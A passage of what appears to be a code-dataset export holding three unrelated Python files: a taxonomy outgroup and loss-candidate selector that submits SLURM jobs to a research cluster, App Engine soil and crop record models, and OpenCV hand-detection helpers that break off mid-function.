    (Taxid_To_Name, Check_Spec_Name_Acceptable_List).  The ``done = True``
    after the early ``return "NA"`` appears unreachable — presumably dead
    code; confirm before relying on the loop flag.
    """
    children = []
    list_ch_remove = []
    child_list_a = []
    #this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
    child_list_atup = Taxid_To_Children(taxid, nodes_file)
    #this is a list of children TAXIDS ONLY
    done = False
    saved_top_level = []
    #we're going to do one at a time, so save all, and load them one-by-one.
    for itema in child_list_atup:
        saved_top_level.append(itema)
    maxi = len(saved_top_level)
    # Start with the first top-level branch only.
    atup = saved_top_level[0]
    saved_top_level.remove(atup)
    child_list_atup = [atup]
    for item in child_list_atup:
        child_list_a.append(item[0])
    i = 1
    #also lets implement a saved second level... for further spe.
    while done is False:
        for item in child_list_atup:
            if item[1] == "species":
                #add the taxid to the list of species_level_children
                children.append(item[0])
                sis_spec_name = Taxid_To_Name(item[0], names_file)
                # Capitalised names only; lower-case entries are not binomials.
                if sis_spec_name[0].islower() is False:
                    in_blast = Check_Spec_Name_Acceptable_List(sis_spec_name, acc_list)
                    if in_blast is True:
                        return sis_spec_name
                list_ch_remove.append(item)
        #remove taxids that were saved at the species level
        for rem in list_ch_remove:
            child_list_atup.remove(rem)
            child_list_a.remove(rem[0])
        #if all tips have terminated at the species level: you are done.
        if child_list_a == []:
            if i == maxi:
                # Every top-level branch exhausted without a valid species.
                return "NA"
                done = True
            else:
                # Move on to the next saved top-level branch.
                i += 1
                list_ch_remove = []
                atup = saved_top_level[0]
                saved_top_level.remove(atup)
                child_list_atup = [atup]
                for item in child_list_atup:
                    child_list_a.append(item[0])
                continue
        list_ch_remove = []
        child_list_b = []
        child_list_c = []
        # Expand one level deeper: replace the worklist with all children of
        # the remaining non-species taxids.
        for parent in child_list_a:
            child_list_btup = Taxid_To_Children(parent, nodes_file)
            for item in child_list_btup:
                child_list_b.append(item[0])
            if child_list_btup == []:
                pass
            else:
                for bitem in child_list_btup:
                    child_list_c.append(bitem)
        child_list_atup = child_list_c
        child_list_a = []
        for itup in child_list_atup:
            child_list_a.append(itup[0])
    #children is a list of all species-level TAXIDS that belong to the given group.
    return "NA"
#WHY ARE THERE TWO OF THESE???????
def Ret_A_Valid_Species_Below(taxid, nodes_file, names_file, acc_list):
    """Depth-first search below ``taxid`` for the first species whose name is
    capitalised and accepted by Check_Spec_Name_Acceptable_List.

    Maintains ``masterlist`` as a stack of child lists; each iteration pops
    the first tuple of the deepest list, returning its name if it is a valid
    species or pushing its own children otherwise.  Returns "NA" when the
    whole subtree is exhausted.

    NOTE(review): relies on sibling helpers defined elsewhere in this file
    (Taxid_To_Name, Check_Spec_Name_Acceptable_List).
    """
    masterlist = []
    #this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
    complete = False
    # Seed the stack with the root taxid (rank placeholder "starter").
    masterlist.append([(taxid, "starter")])
    while complete is False:
        if masterlist == []:
            return("NA")
        #now lookat is the last member of the last list in masterlist.
        now_list = masterlist[-1]
        if now_list == []:
            # Drop every exhausted (empty) list before continuing.
            while [] in masterlist:
                masterlist.remove([])
            if masterlist == []:
                return("NA")
            now_list = masterlist[-1]
        #lookat first member of that list.
        now_tup = now_list[0]
        now_taxid, now_rank = now_tup[0], now_tup[1]
        #see if its a species
        if now_rank == "species":
            now_list.remove(now_tup)
            now_name = Taxid_To_Name(now_taxid, names_file)
            # Capitalised names only; lower-case entries are not binomials.
            if now_name[0].islower() is False:
                in_blast = Check_Spec_Name_Acceptable_List(now_name,acc_list)
                if in_blast is True:
                    #now_name is a species_name
                    return now_name
            #check if now_tup is valid. if so, return.
        else:
            now_list.remove(now_tup)
            #generate a new list - of the descendents of this one.
            newlist = Taxid_To_Children(now_taxid, nodes_file)
            if newlist == "NA":
                pass
            else:
                #add it to masterlist.
                masterlist.append(newlist)
    # Unreachable: ``complete`` is never set True; kept from the original.
    return("Uh, what?")
def Ret_All_Species_Below_Less_Efficiently(taxid, nodes_file):
    """Return the taxids of every species-level descendant of ``taxid``.

    Breadth-first expansion: each pass harvests species from the current
    frontier, removes them, then replaces the frontier with all children of
    the remaining (non-species) taxids, until the frontier is empty.
    """
    children = []
    list_ch_remove = []
    child_list_a = []
    #this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
    child_list_atup = Taxid_To_Children(taxid, nodes_file)
    #this is a list of children TAXIDS ONLY
    for item in child_list_atup:
        child_list_a.append(item[0])
    done = False
    while done is False:
        for item in child_list_atup:
            if item[1] == "species":
                #add the taxid to the list of species_level_children
                children.append(item[0])
                list_ch_remove.append(item)
        #remove taxids that were saved at the species level
        for rem in list_ch_remove:
            child_list_atup.remove(rem)
            child_list_a.remove(rem[0])
        #if all tips have terminated at the species level: you are done.
        if child_list_a == []:
            done = True
        list_ch_remove = []
        child_list_b = []
        child_list_c = []
        #for remaining non-species level taxids in lista:
        # -get their children (listb)
        # -add their children to a persistant list(listc)
        # -then set lista(the list to check and remove species-level-entries) to be == listc.
        for parent in child_list_a:
            child_list_btup = Taxid_To_Children(parent, nodes_file)
            for item in child_list_btup:
                child_list_b.append(item[0])
            if child_list_btup == []:
                pass
            else:
                for bitem in child_list_btup:
                    child_list_c.append(bitem)
        child_list_atup = child_list_c
        child_list_a = []
        for itup in child_list_atup:
            child_list_a.append(itup[0])
    #children is a list of all species-level TAXIDS that belong to the given group.
    return children
def Ret_All_Groups_One_Rank_Below(taxid, nodes_file):
    """Return the taxids of every descendant of *taxid* sitting exactly one
    canonical rank below it (e.g. a class -> all of its orders).

    Returns "NA" when no lower rank exists. Frontier members whose rank is
    already below the target are pruned rather than expanded.
    """
    taxid = taxid.strip()
    print("looking for taxid:"+str(taxid))
    rank = Get_Taxid_Rank(taxid, nodes_file)
    print(rank)
    #raise SystemExit
    target_rank = One_Rank_Lower(rank)
    if target_rank == "NA":
        return("NA")
    removal_ranks = "superkingdom kingdom phylum class order family genus species"
    # everything to the right of the target rank: ranks BELOW the target.
    # NOTE(review): str.split(target_rank) also matches inside "superkingdom"
    # when the target is "kingdom", which would make this unpack raise --
    # confirm One_Rank_Lower can never return "kingdom" here.
    garbage, remove_string = removal_ranks.split(target_rank)
    remove_rank_list = remove_string.split()
    children = []
    list_ch_remove = []
    #print(remove_rank_list)
    #this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
    child_list_a = Taxid_To_Children(taxid, nodes_file)
    done = False
    while done is False:
        for item in child_list_a:
            if item[1] == target_rank:
                #harvest members that are exactly at the target rank
                children.append(item[0])
                list_ch_remove.append(item)
            if item[1] in remove_rank_list:
                # overshot the target rank: drop without expanding
                list_ch_remove.append(item)
        #remove taxids that were harvested (or overshot the target level)
        for rem in list_ch_remove:
            child_list_a.remove(rem)
        #if all tips have terminated at the target species level: you are done.
        if child_list_a == []:
            done = True
        list_ch_remove = []
        child_list_b = []
        child_list_c = []
        #for remaining non-species level taxids in lista:
        # -get their children (listb)
        # -add their children to a persistant list(listc)
        # -then set lista(the list to check and remove species-level-entries) to be == listc.
        for parent in child_list_a:
            child_list_b = Taxid_To_Children(parent[0], nodes_file)
            if child_list_b == []:
                pass
            else:
                for bitem in child_list_b:
                    child_list_c.append(bitem)
        child_list_a = child_list_c
        #print(child_list_a)
    #children is a list of all ONE-RANK-BELOW level TAXIDS that belong to the given group.
    return children
#runs until all children are found of one rank below. eg (CLASS -> [order1, order 2, order3, order 4)
#for checking loss candidates, i will want to 1) run this 2) run a species_level_children generation for each member of the output list. 3) chose one member of each of those output lists to go in the species tree. hopefully checking that we have data for the chosen species.
def Ret_Sister_Same_Rank(string, nodes_file, names_file):
    """Return the taxids of the sister clades of *string* at its own level.

    Resolves *string* to a taxid, steps up to its parent, collects every
    child of that parent, and removes the focal taxid from the result.
    """
    print(string)
    interest_taxid = Str_To_Taxid(string, names_file)
    print(interest_taxid)
    parent_taxid = Return_Parent(interest_taxid, nodes_file).strip()
    interest_taxid = interest_taxid.strip()
    # Taxid_To_Children yields [taxid, rank] pairs; keep only the taxids
    sister_and_self = [pair[0] for pair in Taxid_To_Children(parent_taxid, nodes_file)]
    print(sister_and_self)
    print(interest_taxid)
    sister_and_self.remove(interest_taxid)
    sisterlist = sister_and_self
    print(sisterlist)
    return sisterlist
#sisterlist will be a list of taxids for the sister clades to the current thing. by level, not by rank.
#todo = implement something to redo if sisterlist is empty.
def Taxid_To_Name(taxid, names_file):
    """Reverse of Str_To_Taxid: look up the scientific name for *taxid*.

    Scans an NCBI-style names.dmp file for a row whose first column equals
    *taxid* and whose name class is "scientific name". Returns the stripped
    name, or "NA" (after printing a message) when no such row exists.
    """
    taxid = taxid.strip()
    prefix = taxid + "\t"
    name_wanted = "NA"
    found = False
    with open(names_file) as names:
        for line in names:
            if not line.startswith(prefix):
                continue
            candidate = re.sub("(\d*)(\t\|\t)([^\t]*)(\t\|\t)(.*)(\t\|\t)(scientific name)(.*)", "\\3", line)
            # a leftover tab means this row was not a "scientific name" row
            if "\t" not in candidate:
                name_wanted = candidate.strip()
                found = True
                break
    if found is False:
        print("Error finding name for: "+taxid+" in file: "+names_file)
    return name_wanted
def Choose_One_OG_Seq(string, species_list, names_file, acc_list, nodes_file):
    """Choose one outgroup species name for the clade named *string*.

    Looks for a valid (acceptable-list-backed) species among the sister
    clades of *string*, climbing the taxonomy toward the root until one is
    found. Returns the species name, or "NA" if the root is reached first.
    (*species_list* is accepted for signature compatibility but unused.)
    """
    print("one og sequence choser initiating")
    if "_" in string:
        string = string.replace("_", " ")
    sislist = Ret_Sister_Same_Rank(string, nodes_file, names_file)
    print("Sisterlist")
    print(sislist)
    my_taxid = Str_To_Taxid(string, names_file)
    # if the group has no sisters at its own level, climb until some appear
    go = (sislist == [])
    while go is True:
        parent_of_me_taxid = Return_Parent(my_taxid, nodes_file)
        parent_of_me = Taxid_To_Name(parent_of_me_taxid, names_file)
        sislist = Ret_Sister_Same_Rank(parent_of_me, nodes_file, names_file)
        my_taxid = parent_of_me_taxid
        if sislist != []:
            go = False
    test = "NA"  # bugfix: `test` could be unbound below when sislist was empty
    for item in sislist:
        test = Ret_A_Valid_Species_Below(item, nodes_file, names_file, acc_list)
        if test != "NA":
            print(test)
            return test
    # nothing valid among the first-level sisters: keep moving up the tree
    while test == "NA":
        sislist = []
        go = True
        # bugfix: taxids are strings, so the old `my_taxid == 1` root check
        # could never fire; stop once the taxonomy root is reached
        if str(my_taxid).strip() == "1":
            break
        while go is True:
            parent_of_me_taxid = Return_Parent(my_taxid, nodes_file)
            parent_of_me = Taxid_To_Name(parent_of_me_taxid, names_file)
            sislist = Ret_Sister_Same_Rank(parent_of_me, nodes_file, names_file)
            my_taxid = parent_of_me_taxid
            if sislist != []:
                go = False
        for item in sislist:
            test = Ret_A_Valid_Species_Below(item, nodes_file, names_file, acc_list)
            # bugfix: this condition was inverted -- the old code returned
            # "NA" immediately and threw away any valid hit it found
            if test != "NA":
                return test
    return test
#print (spec_sis_list)
#for sis_spec_taxid in spec_sis_list:
# sis_spec_name = Taxid_To_Name(sis_spec_taxid, names_file)
# in_blast = Check_Spec_Name_Blast_File(sis_spec_name, blast_file)
# if in_blast is True:
# print("Outgroup sequence chosen:"+sis_spec_name)
# return sis_spec_name
#double break so we only keep ONE sequence.
#go all the way down the first one until you get a species-level entry.
#check if the species-level entry is found in your .blast file (if that is where we are implementing this??? )
#if not, continue... check each species-level thing you find.
#this would then need to be included in make_species_trees... and only called if the request is sent directly from Parser_blah_master.
def Check_If_We_Have_A_Rep_Already(species_list, tid_list, rank):
    """Return the taxids from *tid_list* that already have a representative.

    For every species in *species_list*, climbs parents until an ancestor of
    rank *rank* is found (or the search fails); any taxid in *tid_list* that
    shows up among those ancestors is returned.

    NOTE(review): reads `names_file` / `nodes_file` from module globals,
    unlike the sibling helpers that take them as parameters -- confirm they
    are defined at module scope before this is called.
    """
    print("Checking for reps... target rank is: "+rank)
    list_of_correct_rank = []
    found = []
    removal_ranks = "superkingdom kingdom phylum class order family genus species"
    # everything to the left of *rank*: ranks ABOVE the target (overshoot)
    remove_string, garbage = removal_ranks.split(rank)
    remove_rank_list = remove_string.split()
    for species in species_list:
        nid = Str_To_Taxid(species, names_file)
        #go up the ladder
        go = True
        while go is True:
            #get parent taxid
            rp = Return_Parent(nid, nodes_file)
            # no parent found: record the failure and stop climbing.
            # bugfix: the old code fell through and called Get_Taxid_Rank
            # on "NA" after deciding to stop.
            if rp == "NA":
                list_of_correct_rank.append(rp)
                go = False
                continue
            # reached the taxonomy root.
            # bugfix: was `rp.strip() == 1` -- taxids are strings, so the
            # int comparison could never be true.
            if rp.strip() == "1":
                rp = "NA"
                list_of_correct_rank.append(rp)
                go = False
                continue
            #get rank for that new taxid
            par_rank = Get_Taxid_Rank(rp, nodes_file)
            #if it's what we want it to be, add to list.
            if par_rank == rank:
                rp = rp.strip()
                list_of_correct_rank.append(rp)
                go = False
            #if its a step too high, terminate - we went too far somehow
            elif par_rank in remove_rank_list:
                rp = "NA"
                list_of_correct_rank.append(rp)
                go = False
            #else, go up another level and test that one!
            else:
                nid = rp
    print(tid_list)
    print(list_of_correct_rank)
    for item in tid_list:
        if item in list_of_correct_rank:
            a = tid_list.index(item)
            found.append(tid_list[a])
    return found
#@blast_file should actually be a list of raw_blast_FASTA objects
def Choose_Loss_Candidates(string, species_list, names_file, acc_list, nodes_file):
    """Pick one valid species for each subgroup one rank below *string*.

    Subgroups that already have a representative in *species_list* are
    skipped; for each remaining subgroup one acceptable species is chosen.
    Returns the list of chosen species names with failed ("NA") lookups
    counted, reported on stdout, and dropped.
    """
    print("loss search initiating")
    if "_" in string:
        print(string)
        string = string.replace("_", " ")
        print(string)
    taxid = Str_To_Taxid(string, names_file)
    #for checking loss candidates, i will want to 1) run this 2) run a species_level_children generation for each member of the output list. 3) chose one member of each of those output lists to go in the species tree. hopefully checking that we have data for the chosen species.
    sub_taxids = Ret_All_Groups_One_Rank_Below(taxid, nodes_file)
    if sub_taxids == "NA":
        print("Error getting loss candidates for string:"+string)
        return([])
    subgroup_names = []
    for item in sub_taxids:
        subgroup_names.append(Taxid_To_Name(item, names_file))
    # a = rank one below this clade's rank (also used in the summary print)
    b = Get_Taxid_Rank(taxid, nodes_file)
    a = One_Rank_Lower(b)
    found = Check_If_We_Have_A_Rep_Already(species_list, sub_taxids, a)
    print("Representatives already exist for:")
    found_names = []
    # drop subgroups that are already represented, keeping the two parallel
    # lists (taxids / names) in sync
    for foundtid in found:
        foundtid = foundtid.strip()
        index1 = sub_taxids.index(foundtid)
        found_names.append(subgroup_names.pop(index1))
        del sub_taxids[index1]
    print(found_names)
    print("Looking for one representative from each of the following:")
    print(subgroup_names)
    loss_list = []
    ite = 0
    # #first check if it is in the output loss list.
    # for item in sub_taxids:
    # 	with open(saved_loss_candidates) as saved:
    # 		for line in saved:
    # 			if item in line:
    # 				#newthing will be a species name.
    # 				newthing = re.sub("("item")(\t)(.*)", "\\3", line))
    # 				loss_list.append(newthing)
    # 				found2.append(item)
    # 				break
    #remove those found from file from the search list.
    # for item in found2:
    # 	sub_taxids.pop(item)
    for item in sub_taxids:
        test = Ret_A_Valid_Species_Below(item, nodes_file, names_file, acc_list)
        #print(test)
        print(subgroup_names[ite]+" : "+test)
        ite+=1
        loss_list.append(test)
        continue
    print("Loss candidates will be added:")
    # count and then strip the failed ("NA") lookups
    na = 0
    for item in loss_list:
        if item == "NA":
            na +=1
    while "NA" in loss_list: loss_list.remove("NA")
    print(loss_list)
    print("there were "+str(na)+" "+a+"s that no suitable loss candidate was found for.")
    return loss_list
#either one per next-level-down
#or one per next-rank-down
def Check_Spec_Name_Acceptable_List(ssp_name, acc_list):
    """Return True when *ssp_name* matches *acc_list*, either as an exact
    entry or as a substring of an entry (the looser match is reported on
    stdout); False otherwise.

    Bugfix: the old version read the generator variable `item` after the
    generator expression finished, which raises NameError in Python 3 every
    time a substring match was found.
    """
    if ssp_name in acc_list:
        return True
    for entry in acc_list:
        if ssp_name in entry:
            print("Err in match spec name - gen list: "+ ssp_name +" "+ entry)
            return True
    return False
def Check_Spec_Name_Blast_File(ssp_name, blast_fasta_list):
    """Vote on whether *ssp_name* occurs in a majority of the blast FASTA sets.

    Counts how many objects in *blast_fasta_list* list the (underscored,
    stripped) species name, bailing out early once the hit rate falls below
    one third after six attempts. True when more than half of the sets
    contain the name.
    """
    total = len(blast_fasta_list)
    half = total / 2
    hits = 0
    attempts = 0
    query = ssp_name.replace(" ", "_").strip()
    for blast in blast_fasta_list:
        attempts += 1
        # give up early when the hit rate is clearly too low
        if attempts > 6 and hits < attempts / 3:
            return False
        if query in blast.species_names:
            hits += 1
        else:
            # fall back to a substring match against each listed species
            for spec in blast.species_names:
                if query in spec:
                    hits += 1
                    break
    return hits > half
def gen_acceptable_species_list(list_raw_gene_fastas, acc_name):
    """Build the "acceptable species" file for a gene.

    Tallies how many of the raw gene FASTA objects mention each species
    (first-seen order is preserved), keeps only species present in more
    than half of them, writes the survivors to *acc_name* via
    write_acc_list, and returns that filename.
    """
    counts = {}
    for raw in list_raw_gene_fastas:
        raw.gen_species_lists()
        species = raw.species_names
        print(species[0])
        for name in species:
            counts[name] = counts.get(name, 0) + 1
    # a species must occur in more than half of the input files to be kept
    cutoff_num = (len(list_raw_gene_fastas)/2)
    print(cutoff_num)
    rejected = [name for name, n in counts.items() if n <= cutoff_num]
    print(len(rejected))
    dropped = set(rejected)
    accepted = [name for name in counts if name not in dropped]
    return write_acc_list(accepted, acc_name)
def write_acc_list(acc_list, acc_name):
    """Dump *acc_list* to *acc_name*, one entry per line; return the filename."""
    with open(acc_name, "w") as handle:
        handle.writelines(entry + "\n" for entry in acc_list)
    return acc_name
def write_spc_list(spc_list, spcname):
    """Write species names to *spcname*, one per line, trimming any strain
    suffix so each entry is at most Genus_species; return the filename."""
    with open(spcname, "w") as handle:
        for entry in spc_list:
            if "_" in entry:
                parts = entry.split("_")
                entry = parts[0] + "_" + parts[1]
            handle.write(entry + "\n")
    return spcname
#parser stuff
def Run_OG_LOSS_ON_CLUSTER(script_name,all_files, all_result_files):
    """Copy *all_files* to the cluster's ~/Taxonomy directory, submit
    *script_name* via sbatch, then poll (re-copying every 10 minutes) until
    every file named in *all_result_files* exists locally.

    NOTE(review): relies on module-level globals `ssh_inst` and `clus_head`
    for the ssh/scp targets, and on `os` / `time` being imported at module
    scope -- confirm they are defined in the full file.
    """
    #here acc list is the name of the acc_list_current_file
    #auto gen an sbatch script
    os.system(ssh_inst+" \'mkdir Taxonomy\'")
    sb_script = script_name
    #scp it over
    print(all_files)
    for item in all_files:
        os.system("scp "+item+" "+clus_head+"Taxonomy")
    #run it
    #edit the script on the cluster to deal with my mistakes
    os.system(ssh_inst+" 'cd ~/Taxonomy; sbatch "+sb_script+"'")
    #scp it back and verify
    direct = os.getcwd()
    exists = False
    #now it should exist locally
    movehome = []
    # tri-state flag: "start" -> False / "yes" per round -> True when done
    finished = "start"
    #bring home the d
    for i in all_result_files:
        movehome.append(i)
    while finished is not True:
        # pull whatever results have not arrived yet
        for filename in movehome:
            os.system("scp "+clus_head+"Taxonomy/"+filename+" "+direct)
        for item in all_result_files:
            #see if it got moved home.
            exists = os.path.isfile(item)
            if exists is True:
                if item in movehome:
                    movehome.remove(item)
                finished = "yes"
            else:
                finished = False
                print("Tax not done yet. could not locate : "+item+"checking again in 5 minutes")
                break
        if finished == "yes":
            print("Should be done!")
            finished = True
        else:
            #wait ten minutes and then try again.
            time.sleep(600)
            # NOTE(review): immediately reset to "yes" after the sleep; the
            # next round's checks overwrite this, so it looks accidental but
            # is harmless -- confirm intent.
            finished = "yes"
    #TEMPORARILY REMOVED result file deletion from the cluster to make testing progress faster.
    #for item in all_result_files:
    #	os.system(ssh_inst+" 'cd ~/Taxonomy; rm "+item+"'")
    #for item in all_files:
    #	os.system(ssh_inst+" 'cd ~/Taxonomy; rm "+item+"'")
    print("Taxonomy parsing complete")
    #remove the script and the og loss file from cluster
#remove the script and the og loss file from cluster
def Get_OG_LOSS_DATA(list_of_clades, projectname):
    """Run the taxonomy outgroup/loss-candidate search for every clade.

    Builds (or reuses) one "acceptable species" list per gene query file,
    writes per-clade species files plus a correlation file, submits the
    taxonomy parser as a SLURM array job for clades without cached results,
    then reads each clade's result file to attach its loss candidates and
    rooting species. Returns the list of result-file names.
    """
    #the acceptable list should be a list of taxa that are present in at least 50% (?) of the blast hit files for the genes given.
    #get all gene-query-files to look at
    list_catfiles = []
    list_of_lists_of_raw_blast_files = []
    for item in list_of_clades:
        catfile = item.cat_file
        list_of_raw_blast_files = item.blast_raw
        if catfile in list_catfiles:
            pass
        else:
            list_catfiles.append(catfile)
            list_of_lists_of_raw_blast_files.append(list_of_raw_blast_files)
    cat_acc_dict = {}
    #for each, create an acceptable list output name
    for i in range(len(list_catfiles)):
        item = list_catfiles[i]
        list_raws = list_of_lists_of_raw_blast_files[i]
        gsflist = item.split(".")
        gsf_a = gsflist[0]
        gsf_b = gsf_a.split("/")[-1]
        acc_file = gsf_b+"_Acc_List.txt"
        acc_exists = os.path.isfile(acc_file)
        if acc_exists is True:
            pass
        #if not already done, actually make the output acceptable list.
        else:
            print("....initializing all_acceptables from gene_seq_query file: "+gsf_b+". this should only happen once...")
            # pass every raw blast FASTA object associated with the gene
            acc_file = gen_acceptable_species_list(list_raws, acc_file)
        cat_acc_dict[item] = acc_file
    list_of_species_files = Gen_Species_File(list_of_clades, projectname)
    # only re-run the taxonomy step for clades whose result file is missing
    # (avoids wasting time re-running the parser while debugging)
    list_to_tax_clades = []
    for item in list_of_clades:
        exists_result = os.path.isfile(item.result)
        if exists_result is False:
            list_to_tax_clades.append(item)
    #makes the correlation file (species_list, result name, acc_file, string_name per clade)
    corr_file_name, results_list = Generate_Cat_File_OGLOSS(list_to_tax_clades, cat_acc_dict, projectname)
    n = len(list_to_tax_clades)
    #gen the script
    script_name = projectname+"_OGLScript.sh"
    scriptfile = Generate_Script_File_OGLOSS(n, corr_file_name, script_name)
    all_files = []
    for item in cat_acc_dict.values():
        all_files.append(item)
    for item in list_of_species_files:
        all_files.append(item)
    all_files.append(scriptfile)
    all_files.append(corr_file_name)
    # bugfix: was `len(results_list) is 0` -- identity comparison with an
    # int literal is implementation-dependent; use equality.
    if len(results_list) == 0:
        pass
    else:
        Run_OG_LOSS_ON_CLUSTER(scriptfile,all_files, results_list)
    #add loss_species, root_species to each subtree and to its species list.
    for item in list_of_clades:
        results_file = item.result
        loss_species = []
        # bugfix: root_species was unbound below when the result file had
        # fewer than two lines
        root_species = ""
        print(item.string_name)
        #open the file and get loss and species results.
        with open(results_file) as res:
            a=0
            for line in res:
                #line 0: "~"-separated loss candidates
                if a == 0:
                    loss_species = line.strip()
                    loss_species = loss_species.split("~")
                    print("loss candidates")
                    if "" in loss_species:
                        loss_species.remove("")
                    if "\n" in loss_species:
                        loss_species.remove("\n")
                    item.loss_species_list = loss_species
                    print(loss_species)
                #line 1: the chosen rooting species
                if a == 1:
                    root_species = line.strip()
                    item.root_species = root_species
                    print("root: "+root_species)
                #line 2: timing information
                if a == 2:
                    print("time:")
                    print(line)
                a += 1
        item.species_list_plus_og_loss = []
        for thing in item.species_list_original:
            item.species_list_plus_og_loss.append(thing)
        # append any loss candidates and the rooting species to the species list
        if loss_species == []:
            pass
        else:
            for ls in loss_species:
                item.species_list_plus_og_loss.append(ls)
        if root_species == "":
            pass
        else:
            item.species_list_plus_og_loss.append(root_species)
    return results_list
# os.system("rm "+results_file)
#done
def Generate_Cat_File_OGLOSS(list_of_clades, cat_acc_dict, projectname):
    """Write the SLURM-array correlation file mapping 1-based task ids to
    per-clade inputs; return (correlation filename, expected result files)."""
    corr_file_name = "Corr_"+projectname+".txt"
    results_list = []
    with open(corr_file_name, "w") as corr:
        for idx, clade in enumerate(list_of_clades, start=1):
            fields = [str(idx), clade.species_file, clade.string_name,
                      cat_acc_dict[clade.cat_file], clade.result]
            corr.write(" ".join(fields)+"\n")
            results_list.append(clade.result)
    return corr_file_name, results_list
def Generate_Script_File_OGLOSS(n, indexname, scriptname):
    """Write the sbatch array-job script that runs Online_Taxon_Parse.py once
    per line of the correlation file *indexname*; return the script filename."""
    template = """#!/bin/bash
#SBATCH -p sched_mit_g4nier
#SBATCH -t 2-00:00:00
#SBATCH -J Tax
#SBATCH --array=1-%s
. /etc/profile.d/modules.sh
module add engaging/openmpi/1.8.8
MY_ARRAY_ID=$SLURM_ARRAY_TASK_ID
THE_INDEX=%s
SPECIES_FILE=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $2}' )
STRING_NAME=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $3}' )
ACC_FILE=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $4}' )
RESULT=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $5}' )
echo $SPECIES_FILE
echo $STRING_NAME
echo $ACC_FILE
mpirun python Online_Taxon_Parse.py -s $SPECIES_FILE -g $STRING_NAME -b $ACC_FILE -n $RESULT
exit""" % (str(n), indexname)
    with open(scriptname, "w") as script:
        script.write(template)
    return scriptname
def Gen_Species_File(list_of_clades, projectname):
    """Write each clade's (quote-stripped) species list to a per-clade file,
    record the species-file and result-file names on the clade object, and
    return the list of species filenames."""
    list_sp_files = []
    for clade in list_of_clades:
        species_file_name = clade.prefix+"_Species_List.txt"
        # strip any surrounding double quotes from the stored names
        cleaned = [name.strip("\"") for name in clade.species_list_original]
        write_spc_list(cleaned, species_file_name)
        clade.species_file = species_file_name
        list_sp_files.append(species_file_name)
        clade.result = clade.prefix+"_OGL_Result.txt"
    return list_sp_files
|
4,861 | 01a6283d2331590082cdf1d409ecdb6f93459882 | import cgi
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext import db
from models.nutrient import *
class SoilRecord(db.Model):
    """A yearly soil test for a plot: nutrient stats, amendments and notes."""
    year=db.DateProperty(auto_now_add=True)
    stats=NutrientProfile()
    amendments=db.StringProperty()
    notes=db.StringProperty()
    @property
    def plot(self):
        # bugfix: the query was built but never returned, so the property
        # always evaluated to None
        return Plot.gql("Where soilrecord=:1",self.key())
    def create(self, year):
        self.year=year
class CropRecord(db.Model):
    """A yearly cropping record for a plot: the crop keys grown plus notes."""
    year=db.DateProperty(auto_now_add=True)
    crops=db.ListProperty(db.Key)
    notes=db.StringProperty()
    @property
    def plot(self):
        # bugfix: the query was built but never returned, so the property
        # always evaluated to None
        return Plot.gql("Where croprecord=:1",self.key())
    def create(self, year):
        self.year=year
    def addCrop(self, crop):
        # persist only when addByKey reports the key was newly added
        if addByKey(crop, self.crops):
            self.put()
|
4,862 | c3e313805c6f91f9aac77922edfd09650143f905 | import cv2
import numpy as np
from math import *
def appendimages(im1,im2):
    """Return a new image that appends the two images side-by-side.

    The shorter image is padded at the bottom with rows of zeros so both
    inputs share a height before horizontal concatenation.
    """
    rows1 = im1.shape[0]
    rows2 = im2.shape[0]
    if rows1 < rows2:
        # bugfix: `zeros` was unqualified (NameError at runtime whenever the
        # heights differ); qualify it as np.zeros
        im1 = np.concatenate((im1, np.zeros((rows2-rows1, im1.shape[1]))), axis=0)
    elif rows1 > rows2:
        im2 = np.concatenate((im2, np.zeros((rows1-rows2, im2.shape[1]))), axis=0)
    # if none of these cases they are equal, no filling needed.
    return np.concatenate((im1,im2), axis=1)
def append_imgs(im1, im2, im3):
    """Concatenate three equal-height images horizontally into one frame."""
    return np.concatenate((im1, im2, im3), axis=1)
#check whether the point is near edge or not
def point_not_at_edge(x, y, img_height, img_width, threshold):
    """Return True when (x, y) lies more than *threshold* pixels from every
    image border."""
    clear_of_origin_edges = x > threshold and y > threshold
    clear_of_far_edges = fabs(x - img_width) > threshold and fabs(y - img_height) > threshold
    return clear_of_origin_edges and clear_of_far_edges
#check whether two points are too near from each other
def points_not_similar(x, y, x_neighb, y_neighb, threshold):
    """Return True when the Manhattan distance between the two points exceeds
    twice *threshold* (i.e. the points are not near-duplicates)."""
    manhattan = fabs(x - x_neighb) + fabs(y - y_neighb)
    return manhattan > 2*threshold
def good_points(x, y, x_next, y_next, img_height, img_width, threshold):
    """Return True when the two points are distinct (Manhattan distance more
    than twice *threshold*) and (x, y) is away from every image border."""
    distinct = fabs(x - x_next) + fabs(y - y_next) > 2*threshold
    away_from_edge = (x > threshold) and (y > threshold) \
        and (fabs(x - img_width) > threshold) and (fabs(y - img_height) > threshold)
    return distinct and away_from_edge
'''
calculate the point on wrist of the hand
by taking the average of opposites of convexity defects to the center
'''
def find_wrist(center, contour, set_idx_convDefs):
    """Estimate the wrist point of the hand.

    Reflects each selected convexity-defect point of *contour* through
    *center* (p' = 2c - p) and returns the integer average of those
    reflections as an (x, y) tuple.
    """
    count = len(set_idx_convDefs)
    sum_x = 0
    sum_y = 0
    for idx in set_idx_convDefs:
        sum_x += 2*center[0] - contour[idx, 0, 0]
        sum_y += 2*center[1] - contour[idx, 0, 1]
    # float division then int() matches the original truncation behavior
    wrist = (int(sum_x / float(count)), int(sum_y / float(count)))
    return wrist
'''
simple methods to detect finger tips
by calculating the farthest points on convex hull
compared to a fixed point. This fixed point can be center or wrist
'''
def simple_detect_fingerTips(hull, img, fixedPoint, edge_thresh, neighbor_thresh):
    """Return candidate fingertip indices into *hull*.

    Ranks the convex-hull points by Euclidean distance from *fixedPoint*
    (typically the wrist or palm center), then keeps them farthest-first
    while rejecting points within *edge_thresh* of the image border and
    points too close (per *neighbor_thresh*) to an already-accepted one.
    """
    dist_from_fixedPoint = []
    img_height, img_width = img.shape[0:2]
    hull_nbPts = hull.shape[0]
    #calculate distance to fixed Point
    for i in range(hull_nbPts):
